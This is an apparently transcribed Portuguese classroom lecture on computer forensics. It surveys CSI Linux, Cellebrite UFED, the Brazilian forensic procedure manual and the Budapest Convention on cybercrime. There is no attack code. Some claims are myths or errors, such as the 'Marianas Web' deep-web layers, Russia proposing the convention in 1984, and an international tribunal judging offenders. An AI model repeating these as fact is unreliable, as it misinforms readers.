perícia às vezes não dá certo e você fala, não encontrei prova nenhuma, mas na verdade você não soube onde procurar. Beleza? Beleza, vamos lá. Beleza, CSI Linux. Cara, eu amei essa distribuição. Sério, uma distribuição, assim, eu me apaixonei por ela. Por quê? Distribuição, isso aqui foi o que eu escrevi hoje até. Distribuição voltada para a realização de
atividades, inclusive está até errado aqui para mostrar que eu escrevi hoje, de investigação, inteligência e contra-inteligência, além de perícia forense, computacional e teste de intrusão. Eu não consegui subir ela na VM, porque, cara, para subir ela é um trampo, é uma luta. Eu acredito, assim, até o cara brincou, eu e ele hoje mais cedo, que é tipo um filtro. Eles já colocaram essa dificuldade para ser um filtro para as pessoas já desistir ali. Mas, enfim, talvez seja só no bice minha mesmo. CSI Linux, esse cara aqui, ó, é um projeto que ele compõe 3 máquinas. A primeira máquina é a máquina principal, é onde o investigador vai trabalhar. Ele vai ter acesso à rede Tor, toda a Deep Web, entendeu? Ele vai ter ferramentas para acessar todas as 6 ou 5 camadas da Deep Web. A 7ª, dita a Marinas Web, que é comentada aí entre os fóruns underground e a galera que tem um pouco mais de conhecimento. A Marinas Web é uma parada que algumas pessoas dizem que foram lá, mas na verdade ninguém nunca provou que esteve lá. Mas se ela existe ou não, isso é um mistério. O que acontece? O perito forense, quando ele tem acesso a essa ferramenta aqui, ele vai conseguir ter acesso ali a várias ferramentas que vai auxiliar ele a fazer a investigação na Deep Web sem sofrer um ataque reverso. Ela tem uma encriptação incrível na parte de gateway dela, porque é uma segunda máquina que faz o acesso à internet. Essa primeira pega a internet da segunda, e a segunda é ligada de maneira direta à internet, ou seja, ela vai ser ligada na placa, a placa oferece acesso ao gateway, o gateway vai encriptar a comunicação, e essa comunicação vai ser transferida via NAT. Você não tem como mudar, por exemplo, eu vou colocar a máquina principal para acessar a internet direto da rede. Você não pode, é bloqueado. No script, os caras bloqueou pelo script lá. Até eu estava dando uma olhada. E você acessa a internet via esse gateway, que criptografa toda a informação que está sendo trafegada, porque às vezes você precisa, pela rede Tor, fazer um acesso a um servidor remoto, para poder fazer uma perícia remota, entendeu? E aí, se você está trafegando numa terra de ninguém, sem criptografia, é a mesma coisa de estar ali, né? Como diz o outro, 4 horas da manhã na Cracolândia pedindo para não ser assaltado, ou numa rua perigosa. E por aí vai. Na terceira máquina virtual, é uma máquina mais voltada para resposta a incidente, certo? Incidente de segurança, que daí já entra a parte de Red Team, Blue Team, onde você já começa a ter uma análise de rede, análise de tráfego, enfim, são ferramentas voltadas para esse tipo de situação, que também faz acesso dentro do gateway padrão do CSI Linux. Essa é uma ferramenta ainda mais completa do que o Kali Linux, para gente que mexe com perícia, certo? Para gente que mexe com perícia. Positivo. Aí você tem a possibilidade também de instalar suas próprias ferramentas customizadas do seu jeito. E perceba, você não vai conseguir instalar isso no pendrive e levar para qualquer lugar. Ela vem somente em modo OVA, que é para você explodir ela dentro de uma VirtualBox. Olha lá, ó. Torrent file, magnético, você pode baixar. Olha lá, ó. OVA, certo? Aí ele vai o DD para você clonar, mas enfim. Ainda ele está falando do Botable aqui, mas esse Botable, ele vai te dar apenas a um modo live, uma situação ali que você só vai fazer a perícia e tirar ali no local. Mas se você quer ter a ferramenta completa com todos os adendos, é interessante você baixar o ponto .ova, que se não me falha a memória, ela tem 64 GB. Requisitado ali em cima, ele fala, ó. Ele fala em algum aqui, ó. Mínimo 8 GB de RAM, 50 GB de HD, 8 GB de RAM e 64 GB de HD. Mas isso é para cada máquina. São 3. Para cada máquina você precisa ter 8. E aí você imagina o poder da máquina que precisa ter. Não precisa de tudo isso. Quando eu subi, eu consegui, como ele é um Ubuntu, é um Linux, você consegue subir ele com 1,5 GB. Tranquilo. O Ghetto, eu consegui subir ele com 512. Entendeu? Fui testando, estressando, até que eu consegui fazer ele com 512. Por que eles pedem muita memória? Porque às vezes o processamento, o que você está tentando fazer, ocupa muito espaço, muita memória, muito processamento ali, a banda que você está fazendo. Então é interessante você ter memória para poder sobrar dentro da sua investigação.
Vamos lá, porque o tempo não para. UFD Touch, ferramenta utilizada na Operação Lava Jato e recuperação dos dados de dispositivos móveis. Também é utilizada por agências americanas, como a CIA e o FBI. É aquela ferramenta que o professor falou, né? Da Cellebrite. Inclusive, eu acho que eu abri ela em algum lugar aqui. A Cellebrite, aqui, ó. Aí ele fala, dá uma descrição do que é, do segmento que tem, de quantas ferramentas tem, mas essa ferramenta em especial, ela foi utilizada para poder realizar a extração dos dados de smartphone, de HD e tal, na época que ocorreu a Operação Lava Jato lá. Ficou bem conhecida nesse âmbito. Beleza. Que hora que vai ser isso, galera? 9h07, já tá bem tardezinho já. Procedimento operacional da Polícia Criminal. Manual técnico que padroniza as operações periciais em locais de crime. Quem fez foi o Ministério da Justiça e foi publicado em 2013. E o mesmo abrange balística forense, genética forense, informática forense, local de crime, medicina legal, papiloscopia e química forense. O que interessa para nós é a informática forense. O restante é outra parada. E aí o que vem assim? Depois eu vou mostrar ali o documento. Informática forense. Exame pericial de mídia e armazenamento computacional em 3 áreas. Exame pericial de equipamento computacional portátil, exame de local de informática e exame pericial em local de internet. Desculpa, foram 4, certo? Perceba que nessas 4 aqui, ele vai descrever o que é interessante para cada uma das 4. Entendeu? O que eu preciso seguir em cada um dos 4 pontos para poder ter uma perícia conforme o manual manda. Beleza? Vamos dar uma olhada no documento? Deixei ele aberto aqui. Aqui, ó. Esse documento a gente pode encontrar aqui, ó, mt.gov.br, etc, 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 etc. Tá aqui, ó. Procedimento operacional padrão perícia criminal. O que interessa para a gente está na página 84, se não me falha a memória. Deixa eu dar uma olhada aqui no sumário. Informática forense, na 87. Vamos lá. 87. Beleza? Beleza. Informática forense. Procedimento operacional padrão polícia criminal. Aí fala informática forense, publicado. Exame pericial de mídia de armazenamento computacional. É aquele primeiro tópico que eu dei uma olhada. Aí ele vai falar, ó, finalidade. Isso daqui ele sempre vai meio que copiar as mesmas palavras. Orientar o profissional de perícia da área de informática a realizar exames em que envolvam dados contidos em mídias de armazenamento computacional. Público-alvo, peritos criminais afetos à atividade deste POP. Aí ele fala abreviaturas, resultados esperados, que é a padronização, que é para todo mundo seguir o mesmo sistema para que possa, às vezes, não ter tanta divergência. O material, aí ele fala acesso irrestrito. Isso daqui eu vou mandar o link, isso daqui eu recomendo que os senhores olhem com calma, beleza? A gente só vai passar meio que por cima aqui no momento. Procedimento, certo? Aqui ele fala o que você precisa ter para realizar. Procedimento, o que vai ser realizado lá. Aí ele fala 4.1, o que vai ser antes, preliminar, certo? A duplicação de dados, como é que ela tem que ser feita? Processamento dos dados, como é que eu vou processar os dados depois que eu conseguir coletar e duplicar eles? A análise dos dados, como é que eu vou analisar e identificar o que é importante para mim? A extração direta de arquivo, como é que eu vou extrair arquivo diretamente da mídia? Elucidação técnico-pericial. Desculpa pela gaguejação aqui. Como é que eu descrevo, como é que eu vou escrever o meu laudo, mostrando o que eu encontrei, mostrando o que deixou passar, enfim, o que eu consegui levantar em cima daquela situação ali. Exemplo desse tipo de exame, ele vai citar alguns exemplos, né, para você se ambientar, e a elaboração do laudo, tópicos a serem observados dentro do laudo, geração de mídias e anexos, né, que vai no final, como é que eu vou anexar isso no final do meu documento, etc. Pontos críticos, ó, esse item visa destacar os seguintes cuidados necessários durante os exames. Aí ele fala, a evidência digital deve ser examinada apenas por peritos criminais, com treinamento específico e tal, é uma parte mais de orientação de quem pode fazer e como pode fazer.
A estrutura básica do laudo. Preâmbulo, histórico, material, exame, isso daqui é base, ou seja, tem que ser igual a isso daqui. Isso daqui não pode mudar. Você pode colocar mais coisa? Pode, mas o básico para todo perito escrever um laudo tem que seguir essa situação para que quando a pessoa que não tiver um conhecimento técnico pegar, ele saber do que se trata, como se trata e por que está ali. O referencial, né? O referencial que ele usou, o glossário, né? Aqui ele vai falar o mídia de trabalho, data carving, as situações ali. E aqui, no outro, aí ele já entra, ó, exame pericial de equipamento computacional portátil. E aí vai se seguir os outros dois que faltam da mesma situação. A mesma coisa, ele vai falar o que pode ser feito, como é que você vai agir, mas lembrando, dentro de cada tópico em específico. Ele vai te guiar para realizar uma perícia de maneira inteligente. Vamos lá. Shift F5. Tá. Convenção de Budapeste e crime cibernético e cybercrimes. O crime cibernético. Por que eu achei interessante colocar ela? Porque hoje, até onde eu sei, é a única convenção mundial que sentou e falou, não, vamos criar um conjunto de regras a nível internacional que vai caracterizar esse tipo de situação como um crime digital e em qualquer lugar que tiver assinado isso junto com a gente, isso vai valer dentro daquele país e essas leis vão poder ser aplicadas e as penalidades em si. Foi aberta a assinatura em Budapeste em 23 de novembro de 2001. Isso foi aberta a assinatura. Ela foi proposta pela Rússia, se não me falha a memória, em 84, se não estou enganado, certo? E entrou em vigor em 1º de julho de 2004. Hoje, eu não coloquei aqui, mas pode ser que tenha aumentado, mas são 46 países que são adeptos a essa lei. O principal objetivo foi o de estabelecer regras claras e coordenadas entre os estados, países, para lidar com a luta contra a cibercriminalidade. O conselho foi feito na Europa, foi a Europa que propôs no momento ali de 2001, mas a Rússia quem tinha proposto esse acordo inicial lá em 84. Aí ele sofreu algumas mudanças e depois foi para a Europa, e aí na cidade de Budapeste, na Hungria, ele foi assinado. O Brasil não é signatário da Convenção de Budapeste. É uma vergonha. Ele foi convidado, mas os nossos governantes acharam melhor não fazer parte. Agora sabe-se o porquê, né? E crimes previstos. Alguns, né? Não todos. Acesso à interceptação ilegal em redes informáticas, dano e sabotagem informática, uso de vírus, posse, produção e distribuição de material de pornografia infantil na internet. Isso daí está acordado, o acordo que eles firmaram, né? Fala, ó, em âmbito internacional, todo país que tiver assinatura e o indivíduo que for pego dentro desse país estiver realizando um desses crimes, ele vai responder no Tribunal Internacional perante a essa lei, certo? As referências, nos outros eu não coloquei, mas esse aqui eu achei interessante colocar, porque a gente já vai começar a trabalhar mais propriamente dito com a perícia, fica tranquilo que isso daqui eu posso mandar depois, com a perícia forense mais aplicada, e aí a gente já vai começar a pensar no intuito de inteligência e contra-inteligência, certo? Porque o perito, ele não é só perito, ele não só levanta informação, ele também tem que entender como ele mitiga alguma ação do indivíduo contra ele. E aí já começa o processo de contra-inteligência. O meu muito obrigado. Agora, nesse instante, eu abri a perguntas, as sugestões, enfim, e deixo aberto a fala aos senhores. Parabéns, muito bom. Parabéns aí, muito bom. Gostei da palestra. Eu vou abrir só aqui o chat para me acompanhar.
como é que vocês estão conversando aqui. Tá bom. Parabéns, excelente. Obrigado a todos vocês. Né? A gente, a partir daqui, o conteúdo da aula que vem, se não me falha a memória, é engenharia social, né? Eu não lembro. Não lembro o conteúdo da aula, que eu acho que é engenharia social mesmo. É, engenharia social. E no sábado, deixa eu ver qual que é o outro. Antiforense contra inteligência digital no domingo. Ah, beleza. Isso, beleza. Então, quer dizer, galera, ó, vocês que estão aqui, né? Vocês que estão aqui, permaneçam com a gente e tal, porque a aula que vem, e no sábado e domingo, é onde a cobra vai fumar, entendeu? É onde a gente vai falar realmente de inteligência e contra-inteligência, é onde a gente vai começar a entender sobre os processos de levantamento de informação, o ZINT, o MINT, MIGINT, a gente vai entender sobre tecnologia militar, vai entender como é que as grandes nações espionam, entendeu? É onde a gente vai começar a falar sobre espionagem de gente grande, certo? Porque até então eu estou explicando para vocês como é que todo o artigo explica. O artigo de fulano de tal fala que para um segmento de computação forense precisa disso e disso e disso. Isso daí é o que todo mundo precisa saber para o básico, certo? É o que todo mundo precisa aprender para o básico. Mas a gente vai começar a ver umas paradas de outro nível aí. Inclusive, eu quero ver se eu consigo levantar algumas ferramentas, né, que são de caráter de investigação a nível mundial, de engenharia reversa, de escuta, enfim, umas coisas mais elencada com a real inteligência e contra-inteligência, certo? Porque o intuito desse curso é a galera sair daqui, pelo menos com conhecimento superficial, porque se eu falar para vocês que vocês vão sair expert nisso, é mentira. Mas pelo menos um conhecimento superficial ou intermediário, para já saber se virar no dia a dia e entender aonde é que você está sendo, às vezes, alvo de algum levantamento de informação, algum ataque, alguma situação que possa te ocasionar um risco, a sua segurança, da sua família e etc. Isso visando o cenário computacional, certo? Valeu, obrigado. Você tá com nós aí desde o primeiro dia, né? Você aí tá com a gente desde o primeiro dia. Excelente. Então, galera, se ninguém vai ter mais alguma observação, eu vou encerrar a gravação. Aí, se alguém se sentir melhor, perguntar depois da gravação, se tiver vontade. Vamos lá.